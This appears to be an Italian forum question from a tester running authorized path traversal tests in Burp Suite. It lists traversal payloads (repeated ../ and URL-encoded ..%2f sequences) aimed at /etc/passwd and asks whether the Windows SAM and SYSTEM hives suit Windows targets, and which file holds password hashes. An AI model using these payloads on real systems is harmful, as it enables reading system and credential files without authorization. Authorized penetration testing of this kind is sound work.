Sto facendo il test di autorizzazione di Path traversal con Burp Suite. utilizzando payload come di seguito: ../ (FileName)
../../ (FileName)
../../../ (FileName)
../../../../ (FileName)
../../../../../ (FileName)
../../../../../../ (FileName)
../../../../../../../ (FileName)
../../../../../../../../ (FileName)
..% 2f (FileName)
..% 2f ..% 2F (FileName)
Questo FileName = etc / passwd per i sistemi Unix e Unix.
Qualcuno può dirmi cosa dovremmo usare per il sistema basato su Windows invece di etc / passwd.
Se utilizzo C: \ WINDOWS \ system32 \ config \ SAM e C: \ WINDOWS \ system32 \ config \ SYSTEM. Sarà sufficiente?
Quindi qual è il file hash della password per il sistema basato su Windows tenendo presente i test di attraversamento del percorso.